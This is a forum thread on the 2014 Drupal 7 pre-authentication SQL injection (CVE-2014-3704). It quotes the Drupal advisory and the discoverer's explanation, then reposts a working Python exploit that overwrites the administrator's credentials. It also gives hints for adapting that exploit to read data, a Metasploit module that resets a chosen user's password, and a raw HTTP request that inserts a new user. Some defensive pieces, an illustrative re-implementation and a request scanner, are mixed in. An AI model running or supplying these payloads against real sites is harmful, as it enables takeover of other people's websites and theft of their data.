Nytro

Drupal 7.31 pre Auth SQL Injection Vulnerability


[h=1]SA-CORE-2014-005 - Drupal core - SQL injection[/h] Posted by Drupal Security Team on October 15, 2014 at 4:02pm

[h=2]Description[/h] Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

This vulnerability can be exploited by anonymous users.

[h=2]CVE identifier(s) issued[/h]

  • CVE-2014-3704

[h=2]Versions affected[/h]

  • Drupal core 7.x versions prior to 7.32.

[h=2]Solution[/h] Install the latest version:

If you are unable to update to Drupal 7.32 you can apply this patch to Drupal's database.inc file to fix the vulnerability until such time as you are able to completely upgrade to Drupal 7.32.

Also see the Drupal core project page.

[h=2]Reported by[/h]

  • Stefan Horst

[h=2]Fixed by[/h]

[h=2]Coordinated by[/h]

[h=2]Contact and More Information[/h] We've prepared a FAQ on this release. Read more at https://www.drupal.org/node/2357241.

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Source: https://www.drupal.org/SA-CORE-2014-005


Drupal 7.31 pre Auth SQL Injection Vulnerability

Posted: 2014-10-15 10:20 by Stefan Horst | Read in German | More posts about Blog PHP Vulnerabilities


Introduction


Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world.

Drupal 7 is used by a vast number of sites and all of them are vulnerable.

During a source code audit for a customer we found an SQL injection vulnerability in Drupal's core handling of SQL queries, which we disclosed to the vendor. With this bug an attacker can gain full control over all Drupal sites (admin privileges), without knowledge of internals or authentication on the site. He can even execute PHP code without leaving a trace in any log.

The bug was introduced in early 2011 and stayed well hidden in the core framework.

In this post we will discuss the SQL injection on a higher level. If you want all technical details, please refer to the advisory we released.

We will wait until enough sites had time to update before we release a PoC, since this is a severe bug, which allows an attacker to execute arbitrary code with only one HTTP request and no knowledge of the site whatsoever.

The Vulnerability

All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:

SELECT * FROM {users} WHERE name IN (:name_0, :name_1)

This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this:

SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)

which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example.

If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.

Stefan Horst

Source: https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html
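To make the expansion step described above concrete, here is a Python re-implementation of it, added for illustration; it is not Drupal's own code (which is PHP), and the function names, the reindex flag and the sample arguments are assumptions of this example. With reindex=False the array's own keys are written into the placeholder names, as the pre-7.32 code did; with reindex=True the array is renumbered first, which is what the 7.32 fix (array_values on the data array) achieves. The hostile argument set reuses the post's own illustration.

```python
import re
from typing import Any, Dict, List, Tuple

# A bound-parameter name as the abstraction layer expects it: ':identifier'.
PLACEHOLDER_RE = re.compile(r"^:[A-Za-z_][A-Za-z0-9_]*$")


def expand_arguments(query: str, args: Dict[str, Any], reindex: bool) -> Tuple[str, Dict[str, Any]]:
    """Expand each array-valued argument ':key' into ':key_<i>' placeholders.

    reindex=False reproduces the pre-7.32 behaviour: the array's keys are used
    verbatim, so whatever the caller put in those keys lands in the SQL text.
    reindex=True renumbers the array 0..n-1 first (the 7.32 fix), so only
    integers ever reach the query text.
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        pairs = list(enumerate(data.values())) if reindex else list(data.items())
        new_keys = {f"{key}_{i}": value for i, value in pairs}
        expanded = ", ".join(new_keys)
        # Callable replacement so backslashes in the keys are taken literally.
        query = re.sub(re.escape(key) + r"\b", lambda _m: expanded, query)
        del args[key]
        args.update(new_keys)
    return query, args


def unsafe_placeholders(args: Dict[str, Any]) -> List[str]:
    """Defensive post-expansion check: every argument name must still be a
    plain ':identifier'. A clean expansion returns an empty list."""
    return [name for name in args if not PLACEHOLDER_RE.match(name)]


QUERY = "SELECT * FROM {users} WHERE name IN (:name)"
# Constructed input mirroring the post's illustration: the array KEYS, not the
# values, carry the injected text (hypothetical values 'a' and 'b').
HOSTILE_ARGS = {":name": {"test) OR name = 'Admin' -- ": "a", "test": "b"}}

if __name__ == "__main__":
    for mode in (False, True):
        q, a = expand_arguments(QUERY, HOSTILE_ARGS, reindex=mode)
        print("reindex=%s" % mode)
        print("  query:", q)
        print("  unsafe placeholders:", unsafe_placeholders(a))
```

The query text changes only because array keys are interpolated into placeholder names; the values themselves still travel as bound parameters, which is why the usual "prepared statements prevent injection" reasoning did not apply here. unsafe_placeholders() is the kind of cheap guard an abstraction layer can run after expansion: if any generated name is not a bare identifier, the expansion was fed a key it should never have seen.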


Source and full article:

https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html


[h=1]Drupal 7.x SQL Injection SA-CORE-2014-005[/h]

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Usage check moved before argv is read; sys.argv includes the script name, so 3 arguments means length 4
if len(sys.argv) != 4:
    print "host username password"
    print "http://nope.io admin wowsecure"
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
    +user \
    +"'+,+pass+%3d+'" \
    +hash[:55] \
    +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

Exploit: [Python] Drupal 7.x SQL Injection SA-CORE-2014-005 - Pastebin.com


Thanks Nytro.

Does anyone know how a value can be read from the DB instead of doing an update?

Hint 1:

MySQL :: MySQL 5.0 Reference Manual :: 13.2.8 SELECT Syntax

Hint 2: the "post_data" variable must be modified:

"name[0%20;update+users+set+name%3d\'" \
+user \
+"'+,+pass+%3d+'" \
+hash[:55] \
+"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

Hint 3: array[key]

Hint 4: urldecode

Hint 5: escape

Hint 6: concatenation

Good luck! :-)


For Metasploit:


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Drupal 7 SQL Injection - Password Change',
      'Description' => %q{
        This module exploits a SQL injection vulnerability in
        Drupal 7 to update the password of a selected user
        to 'drupal'
      },
      'Author'      =>
        [
          'Stefan Horst', # Vulnerability discovery
          'Charlie Briggs'
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', 'CVE-2014-3704'],
          ['URL', 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'],
          ['URL', 'https://www.drupal.org/SA-CORE-2014-005']
        ],
      'DisclosureDate' => 'Oct 15 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The full URI to Drupal", "/"]),
        OptString.new('USERNAME', [true, "Username of target user", "admin"])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path)
    })
    if res and res.code == 200 and res.body.to_s =~ /form_build_id/
      return Msf::Exploit::CheckCode::Appears
    end
    return Msf::Exploit::CheckCode::Safe
  end

  def run
    print_status("#{peer} - Attempting to update password hash for user '#{datastore['USERNAME']}'")
    hash = "$S$Drl0vgZ9yuU9uc4JyaTMHxMPriC7q/PsOUOx52fCrVQSTpI/Tu4x"
    sqli = "name[lol;update+{users}+set+pass%3d'#{hash}'+where+name%3d'#{datastore['USERNAME']}';--]=lol&name[lol]=lol&pass=lol&&form_build_id=lol&form_id=user_login&op=Log+in"
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path),
      'vars_get' => {
        'q' => 'user',
      },
      'data'     => sqli
    })
    if res and res.code == 200
      print_status("#{peer} - Received 200, checking ability to login...")
      check_login(datastore['USERNAME'], 'drupal')
    else
      print_error("Rut roh. Something went wrong :/")
    end
  end

  def check_login(username, password)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_get'  => {
        'q' => 'user'
      },
      'vars_post' => {
        'name'          => username,
        'pass'          => password,
        'form_build_id' => 'lol',
        'form_id'       => 'user_login',
        'op'            => 'Log In'
      }
    })
    if res and res.code == 302
      print_status("#{peer} - Received 302, following...")
      redirect = URI(res.headers['Location']).path
      cookie = res.headers['Set-Cookie']
      res = send_request_cgi({
        'method'  => 'GET',
        'uri'     => redirect,
        'headers' => {
          'Cookie' => cookie
        }
      })
      if res and res.code == 200
        check_content(res.body.to_s, username, password)
      end
    elsif res and res.code == 200
      check_content(res.body.to_s, username, password)
    end
  end

  def check_content(body, username, password)
    # The original read "body !=~ /not-logged-in/", which Ruby parses as
    # "body != ~/not-logged-in/" and is therefore almost always true; "!~" is
    # the negated match that was intended.
    if body !~ /not-logged-in/
      print_good("Success! Logged in as #{username}:#{password}")
    else
      print_error("Unable to log in, perhaps this site is patched!")
    end
  end
end

https://github.com/cnbriggs/stuff/blob/master/drupal_7_sqli.rb


[h=1]Drupal CVE-2014-3704 insert new user[/h]

POST /drupal/?q=node&destination=node HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.88.88
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko
Content-Type: application/x-www-form-urlencoded
Content-Length: 258

name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in
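For the detection side, the following Python is an added example (not from the original post and not part of any of the scripts above) that scans form-encoded POST bodies of the shape seen in the Python script, the Metasploit module and the raw request in this thread for the one structural signal they all share: a PHP-style array key such as name[...] whose bracketed index contains whitespace, statement separators, quotes, SQL comment markers or SQL verbs. Legitimate Drupal form array indexes are integers or identifiers. The sample bodies and the raw request are constructed, and the function names are my own.

```python
import re
from urllib.parse import unquote_plus
from typing import Dict, List, Tuple

# PHP-style array parameter: base[index]
ARRAY_KEY_RE = re.compile(r"^(?P<base>[^\[]+)\[(?P<index>.*)\]$", re.S)
# Things that never belong in a form array index: whitespace, statement
# separators, quotes, SQL comment markers, or SQL verbs.
SUSPICIOUS_INDEX_RE = re.compile(
    r"[\s;'\"#]|--|\b(select|insert|update|delete|union|drop)\b", re.I)


def parse_form(body: str) -> List[Tuple[str, str]]:
    """Split an application/x-www-form-urlencoded body by hand: urllib's
    parse_qsl treats ';' as a separator on some Python versions, which would
    cut the very pattern we want to see."""
    pairs = []
    for field in body.split("&"):
        if not field:
            continue
        key, _, value = field.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def scan_form_body(body: str) -> List[Dict[str, str]]:
    """One finding per array-style parameter whose index looks like SQL."""
    findings = []
    for key, _value in parse_form(body):
        m = ARRAY_KEY_RE.match(key)
        if m and SUSPICIOUS_INDEX_RE.search(m.group("index")):
            findings.append({"param": m.group("base"), "index": m.group("index")})
    return findings


def scan_http_request(raw: str) -> List[Dict[str, str]]:
    """Apply scan_form_body to the body of a raw HTTP request (headers and
    body separated by a blank line). Non-POST or non-form requests yield []."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition("\n\n")
    lines = head.splitlines()
    if not lines or not lines[0].upper().startswith("POST "):
        return []
    headers = {h.split(":", 1)[0].strip().lower(): h.split(":", 1)[1].strip()
               for h in lines[1:] if ":" in h}
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    return scan_form_body(body.strip())


# Constructed samples (not captured traffic). The hostile body keeps the
# structure of the thread's requests but carries a harmless statement.
SAMPLE_BODIES = {
    "benign login": "name=alice&pass=s3cret&form_build_id=form-abc&form_id=user_login_block&op=Log+in",
    "benign array": "roles[0]=2&roles[1]=3&op=Save",
    "hostile": "name[0%20;select+1;;#%20%20]=x&name[0]=y&pass=z&form_id=user_login_block&op=Log+in",
}
HOSTILE_BODY = SAMPLE_BODIES["hostile"]
SAMPLE_REQUEST = (
    "POST /drupal/?q=node&destination=node HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(HOSTILE_BODY)}\r\n"
    "\r\n"
    f"{HOSTILE_BODY}"
)

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, "->", scan_form_body(body))
    print("raw request ->", scan_http_request(SAMPLE_REQUEST))
```

Two practical notes. First, the index pattern is deliberately broad; tune it against your own traffic before alerting on it, since the cost of a false positive on a form key is low but non-zero. Second, the Python script earlier in the thread treats the PHP warning "mb_strlen() expects parameter 1" in the response as its success indicator, so the same warning appearing in the PHP error log next to a POST to the user login form is a server-side signal worth correlating with the request-body check above.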
